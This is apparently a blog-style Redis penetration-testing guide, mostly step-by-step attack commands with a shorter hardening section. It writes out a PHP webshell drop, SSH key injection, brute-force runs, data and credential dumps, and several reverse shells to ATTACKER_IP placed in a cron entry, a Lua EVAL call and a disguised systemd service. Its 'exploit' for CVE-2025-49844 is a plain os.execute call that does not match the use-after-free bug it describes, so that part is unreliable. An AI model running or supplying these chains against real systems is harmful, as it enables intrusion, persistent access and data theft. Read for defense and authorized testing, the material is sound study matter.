Redis Pentesting: A Comprehensive Advanced Guide - From Enumeration to RCE and Beyond

From Enumeration to Remote Code Execution and Beyond

⚠️ Disclaimer: This guide is intended for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before conducting penetration tests.

🎯 Introduction

Redis is an open-source, in-memory data structure store that has become ubiquitous in modern application architectures. Used by an estimated 75% of cloud environments, Redis serves critical functions in caching, session management, real-time analytics, and message queuing. However, its widespread adoption combined with common misconfigurations creates a significant security risk landscape.

This comprehensive guide explores Redis from an attacker's perspective, covering the complete attack chain from initial reconnaissance through post-exploitation activities. The guide includes practical examples, exploitation techniques, and defensive strategies based on real-world vulnerabilities and recent critical discoveries.

📊 Key Statistics

Internet-Exposed Instances

330,000+

No Authentication

60,000+

Cloud Usage

75%

CVE-2025-49844 CVSS

10.0

🗄️ Redis Overview

What is Redis?

Redis (Remote Dictionary Server) is an in-memory data structure store that provides exceptional performance for applications requiring rapid data access and manipulation. Unlike traditional databases that persist data to disk, Redis maintains its dataset in RAM, enabling sub-millisecond response times.

Common Use Cases

Caching Layer: Reducing database load and improving application response times
Session Storage: Managing user sessions and authentication tokens
Real-Time Analytics: Processing and storing high-frequency data streams
Message Queuing: Implementing pub/sub messaging patterns
Leaderboards: Maintaining sorted sets for competitive rankings
Rate Limiting: Tracking API request rates and enforcing quotas

Default Configuration

By default, Redis listens on port 6379 and does not require authentication. This permissive default configuration, while suitable for development environments, creates significant security risks in production deployments.

# Default redis.conf critical settings
port 6379
bind 127.0.0.1
protected-mode yes
requirepass (not set)
appendonly no

🔍 Phase 1: Reconnaissance and Enumeration

The reconnaissance phase is crucial for identifying Redis instances and gathering information about their configuration and security posture.

Network Scanning

The first step involves identifying open Redis ports on the target network. Redis typically runs on port 6379, but instances may be configured on non-standard ports.

Nmap Scanning

# Basic Redis port scan
nmap -p 6379 <target_ip>

# Service version detection
nmap -sV -p 6379 <target_ip>

# Comprehensive scan with scripts
nmap -p 6379 --script redis-info,redis-brute <target_ip>

# Scan entire network range
nmap -p 6379 192.168.1.0/24

Rustscan (Fast Alternative)

# Ultra-fast port scanning
rustscan -a <target_ip> -- -sV -sC

# Scan with service detection
rustscan -a 192.168.1.0/24 -p 6379 -- -sV

Information Gathering

The INFO command provides comprehensive details about the Redis server, including version, configuration, memory usage, and connected clients.

# Get all information
redis-cli -h <target_ip> INFO

# Get specific sections
redis-cli -h <target_ip> INFO server
redis-cli -h <target_ip> INFO stats
redis-cli -h <target_ip> INFO memory
redis-cli -h <target_ip> INFO clients

Configuration Enumeration

Accessing the Redis configuration reveals critical security settings and potential weaknesses.

# Get all configuration
redis-cli -h <target_ip> CONFIG GET "*"

# Get specific settings
redis-cli -h <target_ip> CONFIG GET requirepass
redis-cli -h <target_ip> CONFIG GET dir
redis-cli -h <target_ip> CONFIG GET dbfilename

🔐 Phase 2: Authentication Bypass

Redis authentication can be bypassed through multiple vectors, from complete absence of authentication to weak credentials.

Passwordless Authentication

By default, Redis does not require authentication. If the requirepass directive is not configured, anyone with network access can connect and execute commands.

# Test for passwordless access
redis-cli -h <target_ip> PING

# If response is "PONG", authentication is not required

Default Credentials

Many Redis deployments are configured with default or weak credentials.

Username	Password	Notes
(none)	(none)	Default configuration
admin	admin	Common weak credential
redis	redis	Service name as password
root	root	System default
user	user	Generic placeholder

Brute Force Attacks

Hydra Brute Force

# Brute force with Hydra
hydra -P /path/to/wordlist.txt redis://<target_ip>

# With username enumeration
hydra -L /path/to/usernames.txt -P /path/to/passwords.txt redis://<target_ip>

# Specific port
hydra -P /path/to/wordlist.txt redis://<target_ip>:6380

Nmap Redis Brute Script

# Using Nmap's redis-brute script
nmap -p 6379 --script redis-brute <target_ip>

# With custom wordlist
nmap -p 6379 --script redis-brute --script-args passdb=/path/to/wordlist.txt <target_ip>

⚔️ Phase 3: Exploitation Techniques

Once authenticated access is obtained, multiple exploitation vectors become available. Each technique has different requirements and impacts.

Webshell Upload via File Write

If Redis has write access to a web server's document root, attackers can write webshells to achieve RCE.

PHP Webshell Upload

# Connect to Redis
redis-cli -h <target_ip>

# Flush the database to ensure clean state
> FLUSHALL

# Set the webshell payload
> SET webshell "<?php system($_GET['cmd']); ?>"

# Configure Redis to write to web directory
> CONFIG SET dir /var/www/html

# Set the database filename
> CONFIG SET dbfilename shell.php

# Save the database to disk
> SAVE

# Access the webshell
# http://target.com/shell.php?cmd=whoami

SSH Key Injection for Persistent Access

By writing SSH public keys to the authorized_keys file, attackers gain persistent SSH access.

# Generate SSH key pair (on attacker machine)
ssh-keygen -t rsa -f redis_key -N ""

# Prepare the public key with proper formatting
(echo -e "\n\n"; cat redis_key.pub; echo -e "\n\n") > key.txt

# Connect to Redis
redis-cli -h <target_ip>

# Flush database
> FLUSHALL

# Load the SSH key
> SET ssh_key "$(cat key.txt)"

# Configure for SSH directory
> CONFIG SET dir /root/.ssh

# Set filename
> CONFIG SET dbfilename authorized_keys

# Save
> SAVE

# Connect via SSH
ssh -i redis_key root@<target_ip>

Cron Job Persistence

Cron jobs can be injected to establish persistent reverse shells or scheduled tasks.

redis-cli -h <target_ip>

# Create reverse shell cron job
> FLUSHALL

> SET cron "* * * * * root /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

> CONFIG SET dir /var/spool/cron/crontabs

> CONFIG SET dbfilename root

> SAVE

💥 Phase 4: Remote Code Execution

CVE-2025-49844 (RediShell) - Critical Lua Sandbox Escape

The most critical Redis vulnerability discovered in 2025, CVE-2025-49844 (RediShell), allows attackers to escape the Lua sandbox and achieve arbitrary code execution.

Property	Value
CVE ID	CVE-2025-49844
Vulnerability Name	RediShell
CVSS Score	10.0 (Critical)
Affected Versions	All versions with Lua scripting
Bug Type	Use-After-Free (UAF) Memory Corruption
Bug Age	~13 years
Disclosure Date	October 3, 2025

The RediShell vulnerability exploits a Use-After-Free (UAF) memory corruption bug that has existed for approximately 13 years in the Redis source code. This flaw allows a post-auth attacker to send a specially crafted malicious Lua script (a feature supported by default in Redis) to escape from the Lua sandbox and achieve arbitrary native code execution on the Redis host.

Exploitation Technique

# Connect to Redis
redis-cli -h <target_ip>

# Send malicious Lua script
> EVAL "return os.execute('whoami')" 0

# Reverse shell via Lua
> EVAL "return os.execute('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')" 0

# Read sensitive files
> EVAL "return io.open('/etc/passwd'):read('*a')" 0

⚠️ CRITICAL IMPACT: CVE-2025-49844 enables complete system compromise. Organizations must update Redis immediately, prioritizing internet-exposed instances.

🔧 Phase 5: Post-Exploitation

Data Exfiltration

Extracting sensitive data from Redis and the compromised system.

# Dump all Redis data
redis-cli -h <target_ip> --rdb /tmp/dump.rdb

# Export specific keys
redis-cli -h <target_ip> KEYS "user:*" | while read key; do
  redis-cli -h <target_ip> DUMP "$key" > "/tmp/${key}.dump"
done

# Extract credentials
redis-cli -h <target_ip> KEYS "*password*"
redis-cli -h <target_ip> KEYS "*token*"

Privilege Escalation

Escalating from the Redis user to root.

# Check sudo permissions
sudo -l

# Check SUID binaries
find / -perm -4000 2>/dev/null

# Check for writable system files
find /etc -writable 2>/dev/null

Persistence Mechanisms

Establishing persistent access for future exploitation.

SSH Key Persistence

# Add attacker's SSH key to authorized_keys
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

Systemd Service Persistence

# Create malicious systemd service
cat > /etc/systemd/system/redis-update.service << EOF
[Unit]
Description=Redis Update Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable redis-update
systemctl start redis-update

🛡️ Defense and Mitigation

Authentication and Access Control

Enable Strong Authentication

# Set a strong password
CONFIG SET requirepass "VeryStrongPassword123!@#"

# Make it persistent
CONFIG REWRITE

Use Redis ACLs (Redis 6+)

# Create user with limited permissions
ACL SETUSER analyst on >password123 +get +info -@all

# List users
ACL LIST

# Get user permissions
ACL GETUSER analyst

Network Security

Bind to Localhost

# redis.conf
bind 127.0.0.1
port 6379
protected-mode yes

Firewall Rules

# Allow only from specific IPs
iptables -A INPUT -p tcp --dport 6379 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 6379 -j DROP

Command Restrictions

Disable Dangerous Commands

# redis.conf
rename-command CONFIG ""
rename-command FLUSHDB ""
rename-command FLUSHALL ""
rename-command KEYS ""
rename-command EVAL ""
rename-command MODULE ""

Encryption

Enable TLS/SSL

# redis.conf
port 0
tls-port 6379
tls-cert-file /path/to/cert.pem
tls-key-file /path/to/key.pem
tls-ca-cert-file /path/to/ca.pem

Monitoring and Logging

Enable Logging

# redis.conf
loglevel notice
logfile "/var/log/redis/redis-server.log"

Monitor Commands

# Real-time command monitoring
redis-cli MONITOR

# Slow log
redis-cli SLOWLOG GET 10
redis-cli SLOWLOG LEN

Patching and Updates

Check Version

redis-cli INFO server | grep redis_version

Update Redis

# Download latest version
wget http://download.redis.io/redis-stable.tar.gz

# Compile and install
tar xzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

✓ BEST PRACTICE: Implement a multi-layered defense strategy combining authentication, network segmentation, monitoring, and regular updates.

📚 References

Sources and Further Reading

[1] Wiz Research. (2025, October 6). Wiz Finds Critical Redis RCE Vulnerability: CVE‑2025‑49844. https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844

[2] Avci, S. (2025, July 30). Using HTTP to Hack Redis: From SSRF to Full Control. Medium. https://medium.com/@sarperavci/using-http-to-hack-redis-from-ssrf-to-full-control-df24e5936677

[3] Hackviser. (n.d.). Redis Pentesting. https://hackviser.com/tactics/pentesting/services/redis

[4] Garg, P. (2023, September 13). Unauthenticated Redis Server Leads To RCE. Medium. https://d4luc1.medium.com/unauthenticated-redis-server-leads-to-rce-6c175c75b293

[5] Saudi, T. (2021, March 23). RCE on Unauthenticated Redis server. Trevor Saudi. https://trevorsaudi.com/posts/2021-03-23_rce-on-unauthenticated-redis-server/

[6] Redis Security Advisory. (2025, October 3). Security Advisory: CVE-2025-49844. Redis. https://redis.io/blog/security-advisory-cve-2025-49844/

ℹ️ Additional Resources: For more information on Redis security, visit the official Redis documentation at https://redis.io/docs/management/security/